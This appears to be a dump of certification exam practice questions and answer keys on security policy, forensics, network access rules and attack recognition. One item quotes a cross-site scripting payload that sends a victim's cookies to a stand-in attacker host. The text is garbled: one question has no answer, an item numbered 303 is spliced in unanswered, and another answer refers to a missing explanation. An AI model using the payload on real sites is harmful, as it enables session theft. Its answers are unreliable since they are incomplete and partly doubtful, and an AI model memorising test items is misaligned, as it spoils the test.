Q1. CORRECT TEXT - (Topic 3)
An administrator wants to install a patch to an application. Given the scenario, download, verify and install the patch in the most secure manner. Instructions: The last install that is completed will be the final submission.
Answer: You need to check the hash value of the downloaded software with the md5 utility.
Q2. - (Topic 4)
In developing a new computing lifecycle process for a large corporation, the security team is developing the process for decommissioning computing equipment. In order to reduce the potential for data leakage, which of the following should the team consider? (Select TWO).
A. Erase all files on drive
B. Install of standard image
C. Remove and hold all drives
D. Physical destruction
E. Drive wipe
Answer: D,E
Q3. - (Topic 5)
Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted?
A. The company should develop an in-house solution and keep the algorithm a secret.
B. The company should use the CEO’s encryption scheme.
C. The company should use a mixture of both systems to meet minimum standards.
D. The company should use the method recommended by other respected information security organizations.
Answer: D
Q4. - (Topic 5)
After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position?
A. Least privilege
B. Job rotation
C. Mandatory vacation
D. Separation of duties
Answer: B
Q5. - (Topic 4)
Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a penetration test?
A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses
Answer: C
Q6. - (Topic 1)
A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected?
A. The malware file’s modify, access, change time properties.
B. The timeline analysis of the file system.
C. The time stamp of the malware in the swap file.
D. The date/time stamp of the malware detection in the antivirus logs.
Answer: B
Q7. - (Topic 4)
An organization is preparing to upgrade its firewall and NIPS infrastructure and has narrowed the vendor choices down to two platforms. The integrator chosen to assist the organization with the deployment has many clients running a mixture of the possible combinations of environments. Which of the following is the MOST comprehensive method for evaluating the two platforms?
A. Benchmark each possible solution with the integrator's existing client deployments.
B. Develop testing criteria and evaluate each environment in-house.
C. Run virtual test scenarios to validate the potential solutions.
D. Use results from each vendor’s test labs to determine adherence to project requirements.
Answer: B
Q8. - (Topic 4)
The Chief Information Security Officer (CISO) regularly receives reports of a single department repeatedly violating the corporate security policy. The head of the department in question informs the CISO that the offending behaviors are a result of necessary business activities. The CISO assigns a junior security administrator to solve the issue. Which of the following is the BEST course of action for the junior security administrator to take?
A. Work with the department head to find an acceptable way to change the business needs so the department no longer violates the corporate security policy.
B. Draft an RFP for the purchase of a COTS product or consulting services to solve the problem through implementation of technical controls.
C. Work with the CISO and department head to create an SLA specifying the response times of the IT security department when incidents are reported.
D. Draft an MOU for the department head and CISO to approve, documenting the limits of the necessary behavior, and actions to be taken by both teams.
Answer: D
Q9. - (Topic 2)
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank’s other systems through dedicated encrypted links. Which of the following is critical to ensure the successful management of system security concerns between the two organizations?
A. ISA
B. BIA
C. MOU
D. SOA
E. BPA
Answer: A
Q10. - (Topic 1)
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "'
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
Q11. CORRECT TEXT - (Topic 2)
Company A has noticed abnormal behavior targeting their SQL server on the network from a rogue IP address. The company uses the following internal IP address ranges: 192.10.1.0/24 for the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the 192.10.5.0/30 IP range.
Instructions: Click on the simulation button to refer to the Network Diagram for Company A.
Click on Router 1, Router 2, and the Firewall to evaluate and configure each device.
Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces.
Task 2: Reconfigure the appropriate devices to prevent the attacks from continuing to target the SQL server and other servers on the corporate network.
Answer: Please check the explanation part for the solution.
Q12. - (Topic 1)
The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement?
A. Avoid
B. Accept
C. Mitigate
D. Transfer
Answer: C
Q13. - (Topic 2)
VPN users cannot access the active FTP server through the router but can access any server in the data center.
Additional network information:
DMZ network – 192.168.5.0/24 (FTP server is 192.168.5.11)
VPN network – 192.168.1.0/24
Datacenter – 192.168.2.0/24
User network - 192.168.3.0/24
HR network – 192.168.4.0/24
Traffic shaper configuration:
VLAN      Bandwidth Limit (Mbps)
VPN       50
User      175
HR        250
Finance   250
Guest     0
Router ACL:
Action   Source           Destination
Permit   192.168.1.0/24   192.168.2.0/24
Permit   192.168.1.0/24   192.168.3.0/24
Permit   192.168.1.0/24   192.168.5.0/24
Permit   192.168.2.0/24   192.168.1.0/24
Permit   192.168.3.0/24   192.168.1.0/24
Permit   192.168.5.1/32   192.168.1.0/24
Deny     192.168.4.0/24   192.168.1.0/24
Deny     192.168.1.0/24   192.168.4.0/24
Deny     any              any
Which of the following solutions would allow the users to access the active FTP server?
A. Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network
B. Add a permit statement to allow traffic to 192.168.5.1 from the VPN network
C. IPS is blocking traffic and needs to be reconfigured
D. Configure the traffic shaper to limit DMZ traffic
E. Increase bandwidth limit on the VPN network
Answer: A
Q14. DRAG DROP - (Topic 3)
Company A has experienced external attacks on their network and wants to minimize the attacks from reoccurring. Modify the network diagram to prevent SQL injections, XSS attacks, smurf attacks, e-mail spam, downloaded malware, viruses and ping attacks. The company can spend a MAXIMUM of $50,000 USD. A cost list for each item is listed below:
1. Anti-Virus Server - $10,000
2. Firewall - $15,000
3. Load Balanced Server - $10,000
4. NIDS/NIPS - $10,000
5. Packet Analyzer - $5,000
6. Patch Server - $15,000
7. Proxy Server - $20,000
8. Router - $10,000
9. Spam Filter - $5,000
10. Traffic Shaper - $20,000
11. Web Application Firewall - $10,000
Instructions: Not all placeholders in the diagram need to be filled and items can only be used once.
Answer:
303. - (Topic 3)
An organization did not know its internal customer and financial databases were compromised until the attacker published sensitive portions of the database on several popular attacker websites. The organization was unable to determine when, how, or who conducted the attacks but rebuilt, restored, and updated the compromised database server to continue operations.
Which of the following is MOST likely the cause for the organization’s inability to determine what really occurred?
A. Too few layers of protection between the Internet and internal network
B. Lack of a defined security auditing methodology
C. Poor intrusion prevention system placement and maintenance
D. Insufficient logging and mechanisms for review
Q15. - (Topic 5)
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Answer: E